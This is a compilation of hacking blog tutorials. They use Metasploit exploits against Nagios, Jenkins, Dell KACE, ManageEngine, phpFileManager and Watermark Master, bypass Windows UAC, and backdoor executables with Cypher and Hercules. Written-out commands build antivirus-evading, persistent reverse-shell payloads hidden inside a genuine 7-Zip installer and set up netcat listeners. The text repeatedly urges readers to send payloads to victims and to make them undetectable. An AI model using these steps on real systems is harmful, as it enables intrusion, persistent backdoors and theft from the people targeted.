System hacking

Bypass uac stands for bypassing user account control. User account control is the security measure introduced in Windows OS since Windows 7. It helps in preventing any malicious program from running with admin privileges. With UAC, applications and tasks always run with privileges of a standard or non-administrator account, unless a user authorizes administrator-level access to the system. UAC will not allow any unauthorized program from making any inadvertent changes to the system.

This may include even our meterpreter shell. We have seen many exploits where we got meterpreter shell. But when you check your privileges by typing command “getuid”, we can see that we are running as a standard user as shown below. When we try to get system privileges with  command “getsystem”, we can see it failed.


Bypass uac exploit as its name implies, bypasses the user account control security feature in Windows 7 to give us system privileges.  This is available in Metasploit. For this exploit to work, we should already have a meterpreter shell on our target system.

Now let use see how to get system privileges with this exploit. First background the current meterpreter session by typing command “background”. Next search for bypassuac exploit as shown below.


Load the exploit as shown below. Type command “show options” to see what options we need to set. We can see only one option is required: session. This is the session id number with which our previous meterpreter session was running. While we background our session, we saw that our session id number is 1. ( see the above image ). Set session id option to 1 as shown below.


Type command “exploit” to run our exploit. Type command “getsystem” to try to get the system privileges once again. This time we successfully got the system privileges as shown below.


Good morning friends. Today we will see about hacking Nagios with Metasploit. Nagios, also known as Nagios Core, is a free and open source computer-software application that is used to  monitor systems, networks and infrastructure. It offers monitoring and alerting services for servers, switches, applications and services. Italso alerts users when things go wrong and alerts them a second time when the problem has been resolved.

Versions of Nagios XI 5.2.7 and below suffer from SQL injection, auth bypass, file upload, command injection, and privilege escalation vulnerabilities. This exploit uses all these vulnerabilities to get a root shell on the victim’s machine. Now let’ see how this exploit works. Start Metasploit and load the module as shown below.


Let us set a new payload as shown below.


Set the target IP address as shown below. Use check command to see whether our target is vulnerable as shown below. If our target is vulnerable, type command “run” to execute our exploit. If everything goes right, we will get a shell on our target as shown below.


How to stay safe:

The current version of Nagios available is 5.29. Please update to the latest version.


Good morning aspiring hackers. Today we will see Windows hacking with Cypher. Cypher is a simple tool to automatically add shellcode to PE files. PE files means portable executable files.

But what is shellcode? It is a list of carefully crafted instructions that can be executed once the code is injected into a running application. So in simple terms, Cypher allows us to add shellcode to portable executable files like…. well it can be any Windows executable. Usually we use shellcode to get a remote shell or create a backdoor shell on our target system.  Cypher even allows us to get the powerful meterpreter shell.

Now let us see how to perform Windows hacking with this tool. First, let us git clone this tool into Kali Linux using commands as shown below.


Make sure you are in the same directory where cypher is cloned. It gives information on how to create different types of payloads. Let us add a reverse meterpreter shell  using the command shown below.


Now let us see all the options we specified.  : syntax of Cypher

-f                   :  the ‘f’ option stands for file. This is to specify the portable executable into which we want to create our                            backdoor. Remember that some executables are packed and don’t allow writing shell code. Test and                                use accordingly. Here, I’m using plink.exe located on my Desktop.

-t                   : the target OS for which you want to create this backdoor for. These include four options: 0,1,2,3. These                           are for Windows 7 32bit, Windows 7  64 bit, Windows 8.1 64bit and Windows 10 64bit respectively.                                 Here I have specified it as 1 since I’m testing it on Windows 7 64bit OS.

-d                  : offset. This is nothing but distance between the point where we are trying to enter our shellcode to the                           point where we are exactly placing our shellcode. Even if you don’t understand that sentence above, let                           me tell you why it’s important. The success of injecting our shellcode into an executable is that the                                   executable should work fine even after we inject our backdoor. The exe shouldn’t crash. By default, this                           value is set to four. But if your exe is crashing, set it to a greater value( I set it to 10) as I did above.

-H                : attacker’s IP address. In our case, IP address of Kali Linux.

-P                 : the port on which we want our shell back.

-p                 : Mind the lowercase. This stands for payload we want to set. ‘1’ stands for                                                                                  Windows/meterpreter/reverse_http.  The other options are,  

                        0 – windows/shell/reverse_tcp, 2- Windows/meterpreter/reverse_http + PrependMigrate,                                                3-  Windows/meterpreter/reverse_https, 4- Windows/meterpreter/reverse_https + PrependMigrate

After setting all the options, hit on Enter. The payload will be created with the same name but end with _evil as shown below. I leave sending the package to our intended victim to you but remember almost every antivirus can detect our file as malicious.

Since my blog is committed to make hacking as close to reality as possible, I have a solution. Google for “making Finfisher undetectable”. Open the first link Google search finds and follow some of the steps shown there. Trust me this works. Now send the package to the victim.


Now to listen to our reverse shell, we need a listener. Open Metasploit and create a reverse_http listener as shown below.


Set the required options like IP address and port. Note that they should be same as we specified while we added shell code to the file. Type run command. The exploit should hang on as shown below.


Now when our victim clicks on the file we sent, we should get a meterpreter reverse shell as shown below.


See how to hack Windows 10 with Hercules 


This post is for educational purpose only and remember that using this tutorial for any nefarious purpose will land you in prison for three years and a fine of two lakh rupees in India. Concerning other countries, Please refer your respective nation’s Cyber law.

Good news : Regardless of what the title says, this works even on windows 8 and 7

Good evening friends. I wanted to test the security of Windows 10 (actually of its antivirus ). Since remote exploits ceased to exist in Windows operating systems after Windows XP,  it can only be done by sending payloads in portable executables. The biggest challenge in sending these  malicious portable executables is bypassing its security mechanisms. Enter Hercules.

Hercules  is a special payload generator that can bypass all antivirus software. It has features like persistence and keylogger which make it too cool. Named after a Greek Hero, Hercules stands up for its name. In our testing, none of the antivirus was able to detect payload generated by Hercules. Now let us see how Hercules can be used to hack Windows 10 . In Kali Linux, open a terminal and type command git clone to clone Hercules into Kali Linux.


The tool is cloned into directory called Hercules. Navigate into that directory and view the contents of the directory as shown below. There is a directory called SOURCE. Move into that directory. There should be a file called HERCULES.go.


Now type command go build HERCULES.go  to build this file. Remember Linux is very strict, so be careful with uppercase and lowercase. Once you run that command, we will get another file with the same name but without any extension as shown below.


Now its time to create our payload. Type command,

./HERCULES 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic 

Let me explain this command. – IP address of our attacker system ( in our case Kali Linux )

4444 – the port number over which we want our victim system to connect to us.

-p – payload ( in this case, windows/meterpreter/reverse_tcp )

-a – architecture of the payload ( 64 bits or 32 bits )

-l – linking ( static or dynamic, dynamic linking reduces the payload size )

Hit on Enter. Our payload is created in the same directory.


Our payload’s name is payload.exe. Type “ls”  as shown below. Now send this file to our victim using your creativity.


On our Kali Linux, type command nc -l -p 4444. We are opening a netcat session on port 4444 ( the same port we set up above). Now when the user clicks on our payload, we will get the remote system’s shell as shown below.


Type command help to see all the commands we can execute on our target system.


For example, type command systeminfo to see all the system settings of our target. This was pretty simple. But this is a one time session, which means once you get out of this session you are disconnected from your victim.


So let’s add a little bit reality to our payload this time. Now we will add two things:persistence and embedding.

–persistence – Once our payload is executed by the victim, it will continually try to connect to our attacker system. So we can end the session and start it once again. The only condition is our victim’s system should be on and of course we should be listening.

–embed – we will add a genuine executable into our payload. Type command

./HERCULES 4444 -p windows/meterpreter/reverse_tcp -a x86 -l dynamic –persistence –embed=/root/Desktop/7z1602.exe 

Here we are embedding 7zip into our payload. Remember we need to send the payload created in SOURCE directory to our victim.


So when victim clicks on our payload to install it, UAC will prompt this window( the user should get a whiff here, if he is aware ).


When the user clicks on “yes”, the installation will progress normally on the victim’s system.


And on our attacker system, we should have already got the victim’s shell as shown below. As I already told, this is a persistent connection. Disconnect the session by typing ‘CTRL+C” and connect again with nc -l -p 4444 to get the session back.  Hope that was helpful. If you have any queries or doubts, please feel free to leave your comments.


Good morning friends. Hope you are doing well. Today we are going to see HTTP client information gathering exploit of Metasploit. As the name explains, this exploit gathers information about our target’s browser which may be useful to us in further exploiting the system. We get information like  OS name, browser version, plugins, etc. Let us see how this exploit works. Start Metasploit and load the exploit as shown below.


This exploit will run a server on the attacker system( here Kali rolling ). So SRVhost IP address should be Kali’s IP address. The port can be default or it can be set to 80 as I have done.


Run the exploit as shown below. It will start a server as shown below. Now we need to send this link to our victim’s.


When the victim clicks on the link, he will be shown a 404 error as shown below.


In the meantime, we will be getting the target information. Given below are the information we gathered from three browsers, Chrome,




and Internet explorer.


We got information like target OS, browser info along with its version, architecture etc.The most valuable info from this can be the OS of our target, the knowledge we can use in choosing our exploits to hack it. Happy hacking.

Good evening friends, today we will see how to exploit a recent vulnerability found in Dell KACE K1000 systems. To those newbies, who don’t know what they are, the Dell KACE K1000 System Management Appliance offers a comprehensive systems management solution including initial inventory and discovery, software distribution, configuration management, patching, security vulnerability remediation, asset management, helpdesk and reporting.

This module of Metasploit exploits a file upload vulnerability in Kace K1000 versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547 which allows unauthenticated users to execute arbitrary commands. First of all start Metasploit and search for our exploit as shown below.


Next, load that exploit. Once the exploit is loaded, see what are the options required for our exploit to work. We will need the IP address of our target and the remote port.


Well, we already know how to find the targets if you have been following all my previous articles. Set the target IP address as shown below. See what payloads this exploit supports.


Set the payload you want. I chose the first one. Once again, check whether all options are set by typing command “show options”.


Once everything is set, use “check” command to see if our target is vulnerable. Not every system you are trying to attack is vulnerable, so keep a list of target IP’s.


Once you find a vulnerable system as shown above, type “run” command to execute our exploit. We should successfully get the remote system’s shell as shown below. Happy hacking.


Good evening friends. Welcome back to Kanishkashowto. Today we will see how to hack remote PC with Jenkins CLI RMI Java Deserialization exploit. It exploits a vulnerability in Jenkins. If you don’t know what Jenkins is, it is “an award-winning, cross-platform, continuous integration and continuous delivery application that increases your productivity. You can use Jenkins to build and test your software projects continuously making it easier for developers to integrate changes to the project, and making it easier for users to obtain a fresh build. It also allows you to continuously deliver your software by providing powerful ways to define your build pipelines and integrating with a large number of testing and deployment technologies.”  An unsafe deserialization bug exists on the Jenkins master, which allows remote arbitrary code execution. The good thing is authentication is not required to exploit this vulnerability.  This exploit works on Jenkins 1.637 version. Ufff, lot of theory, now let’s get into some real stuff.

Start Metasploit and load the exploit as shown below. Type command “show options” to see what are the options required. Set the target address as shown below.


Type command “show payloads” to see the available payloads for this exploit.


Set any payload you want. I chose the above highlighted payload. Set the payload as shown below.


Ok. Run the exploit as shown below. You should get access to the remote system’s shell as shown below.


You can run any commands as shown below.


Good Evening Friends. Today we will see how to hack a remote Linux PC with phpFileManager 0.9.8 rce exploit. rce stands for remote code execution. Phpfilemanager is a complete filesystem management tool on a single file.  Among the features of phpFileManager:
. server info
. directory tree
. copy/move/delete/create/rename/edit/view/chmod files and folders
. tar/zip/bzip/gzip
. multiple uploads
. shell/exec
. works on linux/windows
. php4/php5/apache2 compatible
. english/portuguese/spanish/dutch/french/german/italian/korean/russian/catalan translations.

It is used to manage files of webserver and it boasts of around 382 downloads per week. Its browser interface can be seen below.


We will try to hack into  a Ubuntu 12.10 PC from Kali Linux using this phpFilemanager 0.9.8 rce  exploit. Given below is the Video version of this howto. If you are interested in the textual version scroll down below the video version.

Start Metasploit. Search for the phpfilemanager exploit by typing command “search phpfilemanager” as shown below.


Load the exploit as shown below. Set the required options as shown below. Most of the options are all set except the remote host address, i.e your target’s IP address.


Type command “show payloads” to see the available payloads and set the payload you want. I have selected the payload highlighted below.


Set the payload and check if all required options are set by typing command “show options”.


Type command “exploit” to execute the exploit. If everything went well, you should get the remote pc’s shell as shown below.


It should look like shown below. Type command “ls” to see the contents of the present directory. as shown below. You can see the two files which we saw in our first picture. Now let us navigate to the etc directory as shown below.


And type command “vi passwd” to open the passwd file of the remote PC. Vi is the default text editor in Linux.


Good Evening friends. Today we will see how to hack a remote PC with ManageEngine Desktop Central 9 FileUploadServlet exploit.  Desktop Central is an integrated desktop and mobile device management software that helps in managing servers, laptops, desktops, smartphones, and tablets from a central location. This exploit exploits  a vulnerability in ManageEngine Desktop Central  9 which when uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. Start Metasploit and load the exploit as shown below.  Set the required options. By default, Desktop Central 9 runs on port 8020. Leave the targeturi as default only.


Set the payload as shown below. I am trying to get the shell on remote system. To select a suitable payload, you can type “show payloads” and  choose the payload you want.  Set the required options as shown below.


When all the options are set, type command “exploit“. You should get shell on the remote windows PC as shown below. Hence we have successfully hacked a remote Windows PC with ManageEngine Desktop Central 9 FileUploadServlet exploit.


Good Evening Friends. Today we will see how to hack remote Windows PC with Watermark Buffer Overflow exploit. To those newbies who don’t know what is Watermark master it is ” primarily meant for people who need to protect video or graphics files from illegal copying by putting a watermark (text or graphic information) over an image. Simple text, image file, animated GIF or video file can be used as watermark here. Besides, Watermark Master provides ability to apply a great number of various effects to a watermark, including dynamic effects. A dynamic effect implies variation of the watermark in time, for example, smooth appearance or disappearance of the watermark, movement of the watermark, etc. ” Today we will see how to hack a remote Windows 7 PC with Watermark master buffer overflow exploit. This vulnerability exists in Watermark Master 2.2.23.

You can watch the video version or scroll down if you are of  reading type.

Start Metasploit and load the exploit as shown below. Set the meterpreter/reverse_tcp payload.


Set the required options as shown below.


After setting all the required options, type “exploit”.


But before doing that, we have to create a listener. The process is shown below.


Set all the options. The lhost and lport values should be same as above.


Type command “exploit”. The exploit will run and stop exactly as shown below.


Now send this file to the victim.


Now when user opens this file as shown below,



We will get a meterpreter session as shown below.